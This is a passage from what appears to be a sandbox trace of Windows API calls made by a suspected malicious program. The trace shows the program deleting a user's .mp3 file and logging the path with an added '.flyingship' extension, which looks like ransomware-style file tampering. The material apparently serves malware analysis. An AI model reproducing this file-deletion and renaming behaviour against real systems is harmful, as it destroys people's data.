wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.825] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.825] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0186.826] FreeLibrary (hLibModule=0x75990000) returned 1 [0186.826] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.826] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.826] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.826] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.826] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0186.826] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.826] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.826] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0186.826] FreeLibrary (hLibModule=0x75990000) returned 1 [0186.826] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.826] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.826] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.827] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3", lpFilePart=0x0) returned 0x5b [0186.827] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13b8c90, ftCreationTime.dwHighDateTime=0x1d5e3a0, ftLastAccessTime.dwLowDateTime=0x90f56120, ftLastAccessTime.dwHighDateTime=0x1d5d9a1, ftLastWriteTime.dwLowDateTime=0x14952700, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xd1c3, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="JRSQYNIKKQeiTV.mp3", cAlternateFileName="JRSQYN~1.MP3")) returned 0x90ae18 [0186.828] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\jrsqynikkqeitv.mp3")) returned 1 [0186.829] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13b8c90, ftCreationTime.dwHighDateTime=0x1d5e3a0, ftLastAccessTime.dwLowDateTime=0x90f56120, ftLastAccessTime.dwHighDateTime=0x1d5d9a1, ftLastWriteTime.dwLowDateTime=0x14952700, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xd1c3, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="JRSQYNIKKQeiTV.mp3", cAlternateFileName="JRSQYN~1.MP3")) returned 0 [0186.829] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0186.830] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.830] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0186.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0186.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0186.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0186.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0186.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0186.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0186.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0186.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0186.831] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0186.831] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0186.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0186.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0186.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0186.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0186.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0186.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0186.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0186.831] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0186.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0186.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0186.831] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0186.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0186.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0186.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0186.831] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0186.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0186.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0186.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0186.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0186.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0186.832] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0186.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0186.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0186.832] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0186.833] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0186.833] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0186.833] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0186.833] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0186.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0186.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0186.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0186.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0186.834] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0186.834] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x25d6, lpOverlapped=0x0) returned 1 [0186.834] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0186.834] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x25d6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0186.834] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0186.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0186.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0186.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0186.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0186.835] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.flyingship.mp3\r\n", cchWideChar=105, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 105 [0186.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x69) returned 0x906f38 [0186.835] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.flyingship.mp3\r\n", cchWideChar=105, lpMultiByteStr=0x906f38, cbMultiByte=105, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.flyingship.mp3\r\n", lpUsedDefaultChar=0x0) returned 105 [0186.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0186.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0186.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0186.835] WriteFile (in: hFile=0x138, lpBuffer=0x8fecd8*, nNumberOfBytesToWrite=0x68, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x8fecd8*, lpNumberOfBytesWritten=0x87f43c*=0x68, lpOverlapped=0x0) returned 1 [0186.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0186.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0186.835] CloseHandle (hObject=0x138) returned 1 [0186.836] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0186.836] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0186.836] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0186.836] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0186.836] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0186.836] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0186.836] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0186.836] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0186.836] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0186.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0186.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0186.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0186.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0186.838] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0186.838] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0186.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0186.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0186.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0186.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0186.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3478 | out: hHeap=0x8a0000) returned 1 [0186.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0186.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0186.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0186.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0186.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0186.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0186.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0186.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0186.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0186.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0186.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0186.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0186.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0186.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0186.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0186.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0186.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0186.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0186.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0186.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0186.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0186.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0186.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0186.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0186.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0186.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0186.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0186.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0186.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0186.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0186.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0186.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0186.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0186.839] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0186.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0186.839] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0186.839] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0186.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0186.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0186.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0186.839] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0186.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0186.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0186.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0186.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1900 [0186.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0186.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0186.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0186.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0186.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0186.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0186.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0186.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba1c8 [0186.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0186.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0186.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0186.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0186.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0186.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0186.840] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0186.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0186.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0186.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0186.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0186.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0186.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0186.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0186.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0186.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0186.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0186.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0186.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0186.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0186.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0186.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0186.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0186.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0186.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0186.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0186.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0186.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0186.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0186.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0186.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0186.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0186.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0186.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0186.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0186.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0186.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0186.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 